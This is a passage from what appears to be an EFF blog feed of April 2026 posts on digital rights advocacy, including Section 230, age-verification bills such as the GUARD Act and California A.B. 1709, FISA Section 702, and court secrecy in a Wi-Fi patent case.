leading stance in fighting to preserve the digital rights of Palestinians during a period where there was a very strong influence through the Israeli government. There was actually quite important reporting coming through 7amleh on the situation of online content moderation at a time when it wasn’t really a topic being discussed but it was very clearly a situation where there was major influence by government and political suppression happening as a result. An Ever-Expanding Ecosystem While in the early days, the digital rights movement attracted specialists, today, people from other fields have recognized how digital rights intersect with their work, and the digital rights community has embraced them. Almasri says: Because the digital rights movement has been decentralizing and has stopped being a speciality, it stopped being an exclusive thing for digital rights specialists, since of course the internet not only in the Arab region but all over the world has become a fundamental infrastructure for running any kind of sensitive operations, or operations in general…all types of organizations, and companies, and initiatives are thinking about their digital security, about how internet laws are affecting the use of the internet, or putting them at risk, and how surveillance technologies are affecting their operations. Abukhater credits the collaborative work that emerged within the region over the years in building the movement’s strength: [Today], civil society and digital civil society have many forums, many coalitions and networks, but it’s always important to remember that this is work that builds over many years of experience, and relationships, and networks—that it’s different parties coming to support each other at different phases to ensure that this kind of work succeeds and that this ecosystem is sustained globally with support from partner organizations which were very crucial in ensuring that this ecosystem is sustained, especially in Palestine. Growing Collaborations Conferences like Bread and Net, first held in Beirut in 2018, and the Palestine Digital Activism Forum (PDAF), first held in Ramallah in 2017, bring activists, academics, journalists, and other practitioners together to network and learn about each other’s work. The pandemic, conflict, and other barriers haven’t stopped either conference from carrying on: PDAF has become an annual virtual event that draws big-name speakers, while Bread & Net has spaced out its meetings but continues to draw bigger crowds each time.  Almasri credits these meetings with expanding the movement beyond the traditional techies and activists who first got involved. “You see a wide spectrum of different fields. You see artists, archivists, journalists joining these conversations, which is definitely on the brighter side of things when it comes to this field, or this scene.” She also credits the emergence of alliances such as the Middle East Alliance for Digital Rights (MADR, of which EFF is a member), founded in 2020 by individuals and organizations who had been working together for many years to formalize those collaborations. “Other than the collaborations at the advocacy level, [MADR] creates a sort of pressure point on Big Tech, on content moderation policies, allows for certain coordination at the level of the UN, et cetera, which I see as really positive because it brings some of the redundant efforts together and helps decide on priorities.” Looking Forward In thinking about the future of the movement, Almasri and Najem agree that digital rights are no longer a niche. In Najem’s words, “It’s about everything else…it’s about everything.”  Almasri adds: [W]hen it comes to priorities, things that this scene has been working on, I feel that October 7 [2023] was a big turning point in the way that digital rights activists, researchers, and academics—this field—is looking at digital rights in general. Of course, there is the major question of the need to revise tactics to fight Israel’s tech-enabled genocide that is also empowered by the global economy, big tech, and governments of the world?  What alliances should we start building on a regional and global level? She sees ‘digital sovereignty,’ the ability of people and communities to choose, control, and use technology that serves their needs and values, as one of the next big topics for the movement to tackle, as debates over who owns and hosts our data have sharpened amid revelations that U.S. companies have played a role in regional conflicts. There have been pockets of debates on how to achieve digital sovereignty, especially from human rights organizations documenting war crimes … There’s an awareness of how the dependence on US-based providers, cloud storage, even hosting infrastructure is a risk, especially after how using these services has been weaponized against the digital existence of certain organizations in the region that have been deplatformed or had their content removed on platforms like Meta and YouTube because their content doesn’t align with the foreign policy of the United States…so it raises a big question about how we look at digital independence, what is the spectrum of independence that civil society in the region can achieve, and in relation to what’s available as well. Almasri also points to the role of researchers in the region: There has been a lot more research on the political economy of surveillance technologies, so not only looking at how governments are using them, but their supply chain, who’s investing in these technologies, and how geopolitical networks empowered their proliferation in the hands of governments. This is where studies looking at the political economy of AI and the military become important, trying to understand how this field of weapons, the military, and AI grew together as part of this global capitalist system rather than looking at these technologies in silos, that is. Looking at the proliferation of these technologies from a geopolitical point of view, looking at the bigger ecosystem rather than zooming in to the specifics of it. I think this has been a big development in the way that we look at digital rights, and the way that digital rights have been converged and integrated into the geopolitical scene. As the global digital rights community continues to expand, it’s clear that the questions at its core are no longer just about access or expression, but about power—who holds it, how it is exercised, and who is left out of its protections. What began as a fight to keep the internet open has become a broader effort to reimagine it—an effort that is grappling with questions of infrastructure, ownership, and the global inequalities embedded in both. And yet, despite the scale of these challenges, the movement’s strength lies in the solidarity, the ecosystems, and the networks it has spent more than a decade building. From the early days of the blogging and techie communities to the increasingly powerful digital rights community, advocates in the region have gone up against dictators, endured war and repression, yet remain determined to push forward.

  • EFF Submission to UN Report on the Role of Media in the Context of Israel’s Policies Toward Palestinians
    by Paige Collings on April 29, 2026 at 9:22 pm

    The UN Special Rapporteur on the situation of human rights in the Palestinian territories occupied since 1967 recently announced a study addressing the killings and attacks against Palestinian journalists and media workers, the destruction of media infrastructure in Gaza, and the production and dissemination of narratives that may enable, justify, or incite international crimes.  As part of this consultation, EFF contributed a submission that identifies a significant deterioration of press freedom and free expression in the period since October 2023, including an increase in censorship and wave of killings of journalists; adding to an already pervasive censorship and surveillance regime for Palestinians.  In particular, concerns raised in our submission relate to: Government takedown requests  Disinformation and content moderation Attacks on internet infrastructure The concerns about censorship in Palestine are ever increasing, and include multiple international forums. Ending the deliberate digital isolation of the Palestinian people is critical to protecting fundamental human rights. Read the briefing in full here.

  • Former EFF Activism Director's New Book, Transaction Denied, Explores What Happens When Financial Companies Act like Censors
    by Jason Kelley on April 29, 2026 at 7:26 pm

    A U.S. citizen who teaches Persian poetry classes online is suddenly unable to receive payments or access funds when his account is flagged and frozen by Paypal and its subsidiary Venmo. A Muslim city councilwoman in New York City has a Venmo payment blocked because she uses the name of a Bangladeshi restaurant in the transaction. Online hubs for erotic storytelling repeatedly lose their payment accounts. Others active in drug legalization fights struggle to keep their bank accounts. These may sound like one-off issues, but they are not. They occur with frightening regularity, as former EFF Activism Director and Chief Program Officer, Rainey Reitman, who left EFF in 2022, describes in her new book, Transaction Denied. The book sheds new light on a serious problem that often hides in the shadows, and pushes us to ask an increasingly important question: “Is it ever OK for financial intermediaries to act as the arbiters of online expression?"   Both a storyteller and an advocate, Rainey exposes hidden systems of power that shape our choices, our speech, and, ultimately, our society. - Cindy Cohn Reitman makes her case about the impact of financial institutions and payment intermediaries shutting down accounts and inhibiting transactions through compelling individual stories, some of which have not been shared before. The people impacted are diverse: authors, teachers, journalists, elected politicians, and more are suddenly unable to retrieve or receive funds, with little explanation, transparency, or recourse. Reitman shows the reasons are frequently speech-related, resulting often from arbitrary corporate policy, a broad (mis)interpretation of the law, or in response to pressure from anti-speech advocates.  In the example of the Persian poetry teacher, the blocking is due to the highly risk averse interpretation of U.S. sanctions on Iran—sanctions aimed at deterring weapons development or terrorism instead snared a poetry professor and a New York city councilwoman. Reitman demonstrates how these sanctions, and others, have an outsized impact on Muslims. But Transaction Denied is also a guide for those interested in fighting for free speech. The book covers over a decade of successful campaigns and shows that advocacy can win the day—and is sometimes necessary to counter pro-censorship campaigns. Reitman offers a behind-the-scenes view of the campaign to help restore the Stripe account of the Nifty Archive Alliance, a nonprofit which supports the Nifty Archive, a hub of erotic storytelling for the queer community since 1992. She covers EFF's successful coalition and campaign to restore the PayPal account of Smashwords, a hub for self-published fiction. And in what has become a critical moment for free speech and free press, she describes how several EFF staff members and two EFF board members became the seed for a new nonprofit, the Freedom of the Press Foundation, which continues to partner with EFF today in advancing the rights of journalists. It’s a banner time for books by EFF staff members and friends. If you're concerned about how online privacy has changed over the last three decades, read EFF Executive Director Cindy Cohn's book, Privacy Defender, released in May. (All proceeds from the sale of hard copies of Privacy’s Defender are being donated to EFF, so your book order will help EFF continue fighting for the principles Cindy holds dear.) If you are worried about the individuals trapped in a system where massive financial companies can shut down their individual accounts, effectively locking up their access to money, based entirely on their speech, grab Transaction Denied, released earlier this month, at Beacon Press, Amazon, and Bookshop.org. (Half of the author proceeds go to Freedom of the Press Foundation.)  More likely—you'll want both books on your shelf. Happy reading! 

  • The Open Social Web Needs Section 230 to Survive
    by Rory Mir on April 28, 2026 at 8:59 pm

    If you want to overthrow Big Tech, you’ll need Section 230. The paradigm shift being built with the Open Social Web can put communities back in control of social media infrastructure, and finally end our dependency on enshitified corporate giants. But while these incumbents can overcome multimillion-dollar lawsuits, the small host revolution could be picked off one by one without the protections offered by 230. The internet as we know it is built on Section 230, a law from the 90s that generally says internet users are legally responsible for their own speech — not the services hosting their speech. The purpose of 230 was to enable diverse forums for speech online, which defined the early internet. These scattered online communities have since been largely captured by a handful of multi-billion dollar companies that found profit in controlling your voice online. While critics are rightly concerned about this new corporate influence and surveillance, some look to diminishing Section 230 as the nuclear option to regain control.  The thing is, that would be a huge gift to Big Tech, and detrimental to our best shot at actually undermining corporate and state control of speech online.  Dethroning Big Tech We’re fed up with legacy social media trapping us in walled gardens, where the world's biggest companies like Google and Meta call the shots. Our communities, and our voices, are being held hostage as billionaires’ platforms surveil, betray, and censor us. We’re not alone in this frustration, and fortunately, people are collaborating globally to build another way forward: the Open Social Web.  This new infrastructure puts the public’s interest first by reclaiming the principles of interoperability and decentralization from the early internet. In short, it puts protocols over platforms and lets people own their connections with others. Whether you choose a Fediverse app like Mastodon or an ATmosphere app like Bluesky, your audience and community stay within reach. It’s a vision of social media akin to our lives offline: you decide who to be in touch with and how, and no central authority can threaten to snuff out those connections. It’s social media for humans, not advertisers and authoritarians. Behind that vision is a beautiful mess of protocols bringing open social media to life. Each protocol is a unique language for applications, determining how and where messages are sent. While this means there is great variety to these projects, it also means everyone who spins up a server, develops an app, or otherwise hosts others’ speech has skin in the game when it comes to defending Section 230. What exactly is Section 230? Section 230 protects freedom of expression online by protecting US intermediaries that make the internet work. Passed in 1996 to preserve new bubbling communities online, 230 enshrined important protections for free expression and the ability to block or filter speech you don’t want on your site. One portion is credited as the “26 words that created the internet”: “No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.”  In other words, this bipartisan law recognizes that speech online relies on intermediaries — services that deliver messages between users — and holding them potentially liable for any message they deliver would only stifle that speech. Intuitively, when harmful speech occurs, the speaker should be the one held accountable. The effect is that most civil suits against users and services based on others' speech can quickly be dismissed, avoiding the most expensive parts of civil litigation.  Section 230 was never a license to host anything online, however. It does not protect companies that create illegal or harmful content. Nor does Section 230 protect companies from intellectual property claims.  What Section 230 has enabled is the freedom and flexibility for online communities to self-organize. Without the specter of one bad actor exposing the host(s) to serious legal threats, intermediaries can moderate how they see fit or even defer to volunteers within these communities. Why the Open Social Web Needs Section 230 The superpower of decentralized systems like the Fediverse is the ability for thousands of small hosts to each shoulder some of the burdens of hosting. No single site can assert itself as a necessary intermediary for everyone; instead, all must collaborate to ensure messages reach the intended audience. The result is something superior to any one design or mandate. It is an ecosystem that is greater than the sum of its parts, resilient to disruptions, and enables free experimentation with different approaches to community governance. The open social web’s kryptonite though, is the liability participants can face as intermediaries. A greater potential for liability comes with more interference from powerful interests in the form of legal threats, more monetary costs, and less space for nuance in moderation. And in practice, participants may simply stop hosting to avoid those risks. The end result is only the biggest and most resourced options can survive. This isn’t just about the hosts in the Open Social Web, like Mastodon instances or Bluesky PDSes. In the U.S., Section 230’s protections extend to internet users when they distribute another person’s speech. For example, Section 230 protects a user who forwards an email with a defamatory statement. On the open social web, that means when you pass along a message to others through sharing, boosting, and quoting, you’re not liable for the other user’s speech. The alternative would be a web where one misclick could open you up to a defamation lawsuit. Section 230 also applies to the infrastructure stack, too, like Internet service providers, content delivery networks, and domain or hosting providers. Protections even extend to the new experimental infrastructures of decentralized mesh networks. Beyond the existential risks to the feasibility of indie decentralized projects in the United States, weakening 230 protections would also make services worse. Being able to customize your social media experience from highly-curated to totally laissez-faire in the open social web is only possible when the law allows space for private experiments in moderation approaches. The algorithmically driven firehose forced on users by antiquated social media giants is driven by the financial interests of advertisers, and would only be more tightly controlled in a post-230 world. Defending 230 Laws aimed at changing 230 protections put decentralized projects like the open social web in a uniquely precarious position. That is why we urge lawmakers to take careful consideration of these impacts. It is also why the proponents and builders of a better web must be vigilant defenders of the legal tools that make their work possible.  The open social web embodies what we are protecting with Section 230. It’s our best chance at building a truly democratic public interest internet, where communities are in control.

  • The GUARD Act Isn’t Targeting Dangerous AI—It’s Blocking Everyday Internet Use
    by Joe Mullin on April 27, 2026 at 11:22 pm

    Lawmakers in Congress are moving quickly on the GUARD Act, an age-gating bill restricting minors’ access to a wide range of online tools, with a key vote expected this week. The proposal is framed as a response to alarming cases involving “AI companions” and vulnerable young users. But the text of the bill goes much further, and could require age gates even for search engines that use AI.  TAKE ACTION Tell Congress: oppose the guard act If enacted, the GUARD Act won’t just target a narrow category of risky chatbots. It would require companies to verify the age of every user — then block anyone under 18 from interacting with a huge range of online systems. It would block minors from everyday online tools, undermine parental guidance, and force adults to sacrifice their privacy. In the process, it would require services to implement speech-restricting and privacy-invasive age-verification systems for everyone—not just kids.  Under the GUARD Act’s broad definitions, a high school student could be barred from asking homework help tools questions about algebra problems. A teenager trying to return a product could be kicked out of a standard customer-service chat.  The concerns behind this bill are serious. There have been troubling reports of AI systems engaging in harmful interactions with young users, including cases involving self-harm. Those risks deserve attention. But they call for targeted solutions, like better safeguards and enforcement against bad actors, not sweeping restrictions. The bill’s sponsors say they’re targeting worst-case scenarios — but the bill regulates everyday use.  The GUARD Act’s Broad Definitions Reach Everyday Tools The problem starts with how the bill defines an “AI chatbot.” It covers any system that generates responses that aren’t fully pre-written by the developer or operator. Such a broad definition sweeps in the basic functionality of all AI-powered tools.  Then there’s the definition of an “AI companion,” which minors are banned from using entirely. An AI companion is any chatbot that produces human-like responses and is designed to “encourage or facilitate” interpersonal or emotional interaction. That may sound aimed at simulated “friends” or therapy chatbots. But in practice, it’s much fuzzier.  Modern chatbots are designed to be conversational and helpful. A homework helper might say “good question” before walking a student through a problem. A customer service chatbot may respond empathetically to a complaint (“I’m sorry you’re having this problem.”) A general-purpose assistant might ask follow-up questions. All of these could be seen as facilitating “interpersonal” interaction — and triggering the GUARD Act.  Faced with steep penalties and unclear boundaries, companies are unlikely to take chances on letting young people use their online tools. They’ll block minors entirely or strip their tools down to something less useful for everyone. The result isn’t a narrow safeguard—it’s a broad restriction on everyday online interactions. Homework Question? Show ID And Call Your Parents Start with a student getting help with homework. Under the GUARD Act, the service must verify the user’s age using more than a simple checkbox—it must rely on a “reasonable age verification” measure, which could require a government ID or a third-party age-checking system. If the system decides a user is under 18, the company must decide if its tool qualifies as an “AI Companion.” If there’s any risk it does, the safest move is to block access entirely.  The same logic applies to everyday customer service. A teenager trying to fix an order issue gets routed to a chatbot, and the company faces a choice: build a full age-verification system for a routine interaction, or restrict access to avoid liability. Many will choose the latter. This isn’t a narrow restriction aimed at a few risky products. It’s a compliance regime that pushes companies to block or limit any product that generates text for minors, across the board.  ID Checks for Everyone The GUARD Act doesn’t just affect minors. The bill takes a big step towards an internet that only works when users are willing to upload a valid ID or comply with other invasive age-verification schemes. Companies must verify the age of every user—not through a simple self-declaration, but through a “reasonable age verification” system tied to the individual.  In practice, that means collecting sensitive personal information: government IDs, financial data, or biometric identifiers. Companies can outsource verification, but they remain legally responsible. And the law requires ongoing verification, so this isn’t a one-time check. Worse, studies consistently show that millions of people have outdated information on their IDs, such as an old address, or do not have government ID. Should services require ID, many folks without current or any ID will be shut out.  And for those who do have compliant ID, turning over this information repeatedly creates obvious risks. Databases of sensitive identity information become targets for breaches. Anonymous or pseudonymous use of online tools becomes harder or impossible.  To keep minors away from certain chatbots, the GUARD Act would require everyone to prove who they are just to use basic online tools. That’s a steep tradeoff. And it doesn’t actually address the specific harms the bill is supposed to solve. Vague Definitions, Huge Penalties The GUARD Act’s broad scope is enforced with steep penalties. Companies can face fines of up to $100,000 per violation, enforced by federal and state officials. At the same time, key terms like “AI companion” rely on vague concepts such as “emotional interaction.” That combination will lead to overblocking. Faced with legal uncertainty and serious liability, companies won’t parse small distinctions. They’ll restrict access, limit features, or block minors entirely. That is the unfortunate result of the GUARD Act, even though the concerns animating it are worthy of fixing. But the GUARD Act’s broad terms will apply far beyond the concerning scenarios.  In the end, that means a more restricted and more surveilled internet. Teenagers would lose access to tools they rely on for school and everyday tasks. Everyone else faces new barriers, including ID checks. Smaller developers, who aren’t able to absorb compliance costs and legal risk, would be pushed out, leaving the largest companies even more dominant.  Young people — and all people — deserve protection from genuinely harmful products. But this bill doesn’t do that. It trades away privacy, access, and useful technology in exchange for a blunt system that misses the mark.  Congress could act soon. Tell them to reject the GUARD Act.  TAKE ACTION Tell Congress: say no to mandatory online id checks

  • Congress Must Reject New Insufficient 702 Reauthorization Bill
    by Matthew Guariglia on April 27, 2026 at 9:55 pm

    Speaker Johnson has introduced a new fig leaf over the American surveillance state, the Foreign Intelligence Accountability Act. Introduced with only days to go before Section 702 of the Foreign Intelligence Surveillance Act (FISA) expires and the U.S. government loses one of its most invasive surveillance programs, the bill does nothing to make any of the substantial changes privacy advocates have been asking for --- most notably, it fails to give us a real warrant requirement for the FBI to snoop through the private conversations of people on U.S. soil.   Section 702 needs to be reauthorized by Congress every few years. These reauthorizations give us a chance to tinker with the language of the law and introduce some much-needed reforms. This attempt at reauthorization has been particularly fraught, but there is still time for Congress to include real protection for Americans’ civil liberties and rights. We need to make sure that when an FBI agent wants to look through Americans’ conversations scooped up as part of a national security intelligence program, they need a warrant signed by a judge just as if they were trying to search your email account or your house.  This new bill mandates that a civil liberties protection officer at the Director of National Intelligence review all queries of U.S. persons made by the FBI under this program to make sure no laws have been broken. It’s bad enough to let the intelligence community police itself, and what’s more, the assessment for illegality would be made after a U.S. person has already been spied on. This is hardly the reform we need and will likely just lead to continued abuse with no real accountability or consequences.   The bill “prohibits targeting United States persons,” but so does current law. This “change” does absolutely nothing to address what’s really happening—which is that surveillance of people in the United States is usually justified as “incidental” because Americans aren’t the “target” of the surveillance. The bill does not create a warrant requirement, it does not create any new transparency requirements, and it does not protect Americans’ privacy.   We urge Congress, and we urge you to write to your Congresspeople, to tell them this: Reject the surveillance state’s latest smokescreen known as the Foreign Intelligence Accountability Act and keep pushing for real reforms.  

  • The Internet Still Works: SmugMug Powers Online Photography
    by Joe Mullin on April 27, 2026 at 5:44 pm

    SmugMug is a family-owned photo hosting and e-commerce platform that helps professional photographers run their businesses online. Founded in 2002, the company provides tools for photographers to show their work, deliver client galleries, sell prints, and manage payments.  In 2018, SmugMug purchased Flickr, the long-running photo-sharing community, which added tens of millions of active hobbyist photographers to the company’s user base.  Ben MacAskill is President and COO of SmugMug’s parent company, Awesome, which he co-founded with his family. Awesome also includes the media network This Week in Photo and the nonprofit Flickr Foundation, which focuses on preserving publicly available photography. MacAskill has been an active voice in policy discussions around Section 230 and online platform regulation. He was interviewed by Joe Mullin, a policy analyst on EFF's Activism Team. Joe Mullin:  How would you explain Section 230 to a SmugMug photographer who hasn't heard of it but relies on you to share their work, run their business. Ben MacAskill: Section 230 allows us to run our business. We are a small, family run business. We don’t have the resources to police every single upload, every single comment, or every single engagement that happens on the site.  That includes photographers who have comments on their sites. Anywhere there’s interaction online, Section 230 protects us.  It doesn't absolve us of liability. We can't run rampant and do anything we want. It  just helps protect us and make it scalable so that we can run our business. What would you have to change if Section 230 were eliminated or significantly narrowed?  Honestly, there's a high chance that it would bankrupt platforms like ours. They're not wildly profitable. If Section 230 is done away with, we have to [check] content that goes online to make sure we’re not liable. That means policing tens of millions of uploads per day.  That would kill the business of a lot of photographers. Can you imagine—you just got married, and you’re waiting for your wedding photos for a week or two because they’re in some moderation queue?  If we don’t have legal protections, and we get one nefarious customer—if something goes sideways—then I’m liable for that.  I don't, and can't possibly know, whether every single photo is appropriate or legal, as it's uploaded. We would literally have to moderate everything before it goes online. I don’t think any business can afford that, period. I guess you could have an offshore call-center type thing. Still, it would change the entire nature of the real-time internet. Imagine posting something to Instagram and having the platform say, “Cool, we’ll get back to you in 8 to 12 days.”  What kind of content moderation do you do on SmugMug?  If a user uploads something illegal, we will report them as soon as we find it. We're not protecting them. We don’t condone or allow illegal behavior. We work very closely with organizations, nonprofits and governmental agencies to detect CSAM—child exploitative material—and we report that to the National Center for Missing and Exploited Children. We will report users, we eliminate illegal content on our platforms—which is one reason we have such a low prevalence of that problem.  But that does take effort and time to find, and there is currently no perfect solution. The tech solutions that exist can’t detect it at 100% accuracy, or anywhere close. And with tens of millions of uploads a day, going through them one by one is impossible.  How do you think more generally about protecting user speech and creative expression?  On SmugMug, we’re really focusing on professionals running their business. So we don’t have to [weigh in] on content too much.  On Flickr, we are big proponents of expression and artistic creativity. Photographers have opinions! But we do draw the line at things like hate speech and harassment. We aggressively maintain a friendly platform. Our community guidelines are very specific, that you cannot harass other customers, you cannot upload stuff classified as hate speech, or threats, or anything along those lines.  Those rules are generally policed by the community. We do have some text analysis tools, but when community members feel harassed or threatened, reports will come in. We’ll address them on a one-by-one basis and remove harassing material from our platform.  Our ability to moderate is one of the things that makes Flickr what it is. If we lose the ability to enforce our own moderation rules—or have that legislated for us—then it changes the entire nature of the community. And not in a good way. Losing the ability to moderate would permanently and forever change what we've built. What kind of complaints or takedown requests do you receive, and how do you handle it, both in the U.S. and abroad?  Flickr is often referred to as the friendliest community online. You know, we're not dealing with a lot of hate. We're not dealing with a lot of threats. Under other frameworks, like the DMCA, we do takedowns on copyrighted material.  We’re able to handle it with a fully internal team, and we have a great track record. But the user base and the content base is so large that, if we had to assume that those tens of millions of uploads a day are problematic, the burden would be extreme.  We have a robust Trust and Safety Team, and we operate in every non-embargoed country on Earth. So we are subject to a lot of different laws and regulations: “likeness” rules and privacy rules in certain countries that don't exist here in the United States. Even state to state, there’s some varying laws. It’s a complicated framework, but we pay attention to it.  The globe responds in much the same way that Section 230 is working. That is, we operate on reports and discovery, not on pre-screening everything.  What do you think that policy makers most often misunderstand about how platforms like yours operate? One misconception is that we are not beholden to any laws. That Section 230 absolves us of any responsibility and any liability, and we can just do whatever we want. They talk about it as “reining in tech companies,” or “holding tech companies accountable.” But I am accountable for the content on my platform. We’re not given this “get out of jail free” card.  And I think they assume all platforms don’t really care about this, that anything that is done is done begrudgingly. But we’re very proactive about keeping a clean, polite, and friendly community. We are already very aggressively policing our platform.  And even legal content gets moderated, because it might just not be appropriate for a particular community.  We enforce our rules, and much the way that other private in-person businesses will enforce their rules. If you start screaming hateful things at patrons in a coffee shop, they’re going to throw you out. They want a quiet, chill vibe where people can sip their lattes. We’re doing the same sort of things.  As an independent family owned company you’re in an ecosystem dominated by much larger platforms. How are these issues different for you as a smaller service?  I think it's a much more existential threat for middle and small tech companies. It also shuts off the next generation of these platforms. The computer science student in a dorm room right now won't have the legal protections to launch, to even try to build something new. At least not here in the United States. 

  • Act Now to Stop California’s Paternalistic and Privacy-Destroying Social Media Ban
    by Molly Buckley on April 24, 2026 at 11:11 pm

    California lawmakers are fast-tracking A.B. 1709—a sweeping bill that would ban anyone under 16 from using social media and force every user, regardless of age, to verify their identity before accessing social platforms. That means that under this bill, all Californians would be required to submit highly sensitive government-issued ID or biometric information to private companies simply to participate in the modern public square. In the name of “safety,” this bill would destroy online anonymity, expose sensitive personal data to breach and abuse, and replace parental decision-making with state-mandated censorship. A.B. 1709 has already passed out of the Assembly Privacy and Judiciary Committees with nearly unanimous support. Its next stop is the Assembly Appropriations Committee, followed by a floor vote—likely within the next week. Take action Tell Your Representative to OPPOSE A.B. 1709 California Is About to Set a Dangerous Precedent for Online Censorship By banning access to social media platforms for young people under 16, California is emulating Australia, where early results show exactly what EFF and other critics predicted: overblocking by platforms, leaving youth without support and even adults barred from access; major spikes in VPN use and other workarounds ranging from clever to desperate; and smaller platforms shutting down rather than attempting costly compliance with these sweeping bills. California should not be racing to replicate those failures. After all, when California leads—especially on tech—other states follow. There is no reason for California to lead the nation into an unconstitutional social media ban that destroys privacy and harms youth. Take action Tell Your Representative to OPPOSE A.B. 1709 What’s Wrong With A.B. 1709? Just about everything. A.B. 1709 weaponizes legitimate parental concerns by using them to hand over even more censorship and surveillance power to the government. Beneath its shiny “protect the children” rhetoric, this bill is misguided, unconstitutional, and deeply harmful to users of all ages. A.B. 1709 Recklessly Violates Free Speech Rights The First Amendment protects the right to speak and access information, regardless of age. But by imposing a blanket ban on social media access, A.B. 1709 would cut off lawful speech for millions of California teenagers, while also forcing all users (adults and kids alike) to verify their ages before speaking or accessing information on social media. This will immensely and unconstitutionally chill Californians’ exercise of their First Amendment. These mandates ignore longstanding Supreme Court precedent that protects young people’s speech and consistently find these bans unconstitutional. Banning young people entirely from social media is an extreme measure that doesn’t match the actual risks of online engagement. California simply does not have a valid interest in overriding parents’ and young people’s rights to decide for themselves how to use social media. After all, age-verification technology is far from perfect. A.B. 1709’s reliance on imperfect age-verification technology will disproportionately silence marginalized communities—those whose IDs don’t match their presentation, those with disabilities, trans and gender non-conforming folks, and people of color—who are most likely to be wrongfully denied access by discriminatory systems.   Finally, many people will simply refuse to give up their anonymity in order to access social media. Our right to anonymity has been a cornerstone of free expression since the founding of this country, and a pillar of online safety since the dawn of the internet. This is for good reason: it allows creativity, innovation, and political thought to flourish, and is essential for those who risk retaliation for their speech or associations. A.B. 1709 threatens to destroy it. AB 1709 Needlessly Jeopardizes Everyone’s Privacy A.B. 1709’s age verification mandate also creates massive security risks by forcing users to hand over immutable biometric data and government IDs to third-party vendors. By creating centralized "honeypots" of sensitive information, the bill invites identity theft and permanent surveillance rather than actual safety. If we don’t trust tech companies with our private information now, we shouldn't pass a law that mandates we give them even more of it.  We’ve already seen repeated data breaches involving age- and identity-verification services. Yet A.B. 1709 would require millions more Californians—including the youth this bill claims to protect—to feed their most sensitive data into this growing surveillance ecosystem.  This is not the answer to online safety. Take action Tell Your Representative to OPPOSE A.B. 1709 AB 1709 Harms the Youth It Claims to Protect While framed as a safety measure, this bill serves as a blunt instrument of censorship, severing vital lifelines for California’s young people. Besides being unconstitutional, banning young people from the internet is bad public policy. After all, social media sites are not just sources of entertainment; they provide crucial spaces for young people to explore their identities—whether by creating and sharing art, practicing religion, building community, or engaging in civic life.  Social science indicates that moderate internet use is a net positive for teens’ development, and negative outcomes are usually due to either lack of access or excessive use. Social media provides essential spaces for civic engagement, identity exploration, and community building—particularly for LGBTQ+ and marginalized youth who may lack support in their physical environments. By replacing access to political news and health resources with state-mandated isolation, A.B. 1709 ignores the calls of young people themselves who favor digital literacy and education over restrictive government control. Young people have been loud and clear that what they want is access and education—not censorship and control. They even drafted their own digital literacy education bill, A.B. 2071, which is currently before the California legislature! Instead of cutting off vital lifelines, we should support education measures that would arm them (and the adults in their lives) with the knowledge they need to explore online spaces safely. AB 1709 Is Misguided and Won’t Work In case you needed more reasons to oppose this bill. A.B. 1709 Replaces Parenting With Government Control. Families know there is no one-size-fits-all solution to parenting. But AB 1709 imposes one anyway, overriding parental decision-making with a blanket censorship prohibition. Parents who want to actively guide their children’s online experiences should be empowered, not relegated to the sidelines by a blunt state mandate. A.B. 1709 Strengthens Big Tech Instead of Challenging It. Supporters claim that this bill will rein in the major tech companies, but in fact, steep fines and costly compliance regimes disproportionately harm smaller platforms. Where large corporations can afford to absorb legal risk and shell out for expensive verification systems, smaller forums and emerging platforms cannot. We’ve already seen platforms shut down or geoblock entire states in response to age-gating laws. And when the small platforms shutter, where do all of those users—and their valuable data—go? Straight back to the biggest companies. A.B. 1709 Creates Expensive and Shady Bureaucracy During a Budget Crisis. California is facing a massive deficit, but A.B. 1709 would waste taxpayer dollars to fund a shadowy new "e-Safety Advisory Commission" to enforce this ban and dream up new ways to censor the internet. In addition, lawmakers in support of A.B. 1709 have already admitted that this bill is likely to follow the same path as other recent "child safety" laws that were struck down or blocked in court for First Amendment and privacy reasons. With A.B. 1709, taxpayers are being asked to hand over a blank check for millions in legal fees to defend a law that is unconstitutional on its face. Californians: Act Now to Kill This Bill A.B. 1709 is not an inevitability, as some supporters want you to believe. But we need to act now to support our youth and their right to participate in online public life. Your representatives could vote on A.B. 1709 as soon as next week. If you’re a Californian, email your legislators now and tell them to vote NO on AB 1709. Take action Tell Your Representative to OPPOSE A.B. 1709

  • EFF Challenges Secrecy In Eastern District of Texas Patent Case 
    by Betty Gedlu on April 24, 2026 at 10:57 pm

    Clinic students Emily Ko and Zoe Lee at the Technology Law and Policy Clinic at the NYU School of Law were the principal authors of this post. Courts are not private forums for business disputes. They are public institutions, and their records belong to the public. But too often, courts forget that and allow for massive over-sealing, especially in patent cases.  EFF recently discovered another case of this in the Eastern District of Texas, where key court filings about Wi-Fi technology used by billions of people every day were hidden entirely from public view. The public could not see the parties’ arguments about patent ownership, the plaintiff’s standing in court, or licensing obligations tied to standardized technologies. EFF Seeks to Uncover Sealed Information in Wilus  The case Wilus Institute of Standards and Technology Inc. v. HP Inc., highlights a recurring transparency problem in patent litigation.  Wilus claims to own standard essential patents (SEPs) related to Wi-Fi 6 — technology embedded in everyday devices. Wilus sued Samsung and HP for patent infringement. HP argued that Wilus failed to offer licenses on Fair, Reasonable, and Non-Discriminatory (FRAND) terms, which are required to prevent SEP holders from exploiting their position, by blocking fair access to widely used technologies.  In reviewing the docket, EFF found that many filings were improperly sealed under a lenient protective order without the required, specific justification needed in a proper motion to seal. Because there is a presumption of public access to court filings, litigants must file a motion to seal and demonstrate compelling reasons for secrecy. This typically requires a document-by-document and line-by-line justification.  In the Eastern District of Texas, that standard is often not enforced. Instead, district judges allow litigants to hide information using boilerplate justification in a protective order without explaining why specific documents or specific parts in a document should be hidden.  In Wilus, two sets of documents stood out.  First, Samsung moved to dismiss the case, arguing Wilus may not have validly obtained the patents — raising doubts about whether they had standing to sue at all. Wilus’s opposition to that motion was filed completely under seal, with no redacted public version available at all. That briefing likely addresses the patent assignment agreements that underpin Wilus’s business model — information the public has an interest in, especially in cases involving non-practicing entities (NPEs) like Wilus.  Second, filings related to HP’s supplemental briefing on FRAND obligations were also sealed in full, with no redacted versions available to the public. Whether Wilus is bound by FRAND has implications far beyond this case. Companies subject to FRAND must adhere to reasonable licensing terms, while those that are not can charge significantly higher licensing fees.  In both instances, the public was shut out of arguments that bear directly on how essential technologies are licensed and controlled. EFF Pushes For Public Access  EFF raised these concerns with Wilus’s counsel and pressed for public access to the sealed records. Wilus ultimately agreed to file redacted versions of several documents now available as Document Numbers 387, 388, and 389.  That result is progress, but it shouldn’t require outside intervention. Public versions of court filings should be the default, not something negotiated after outside pressure. 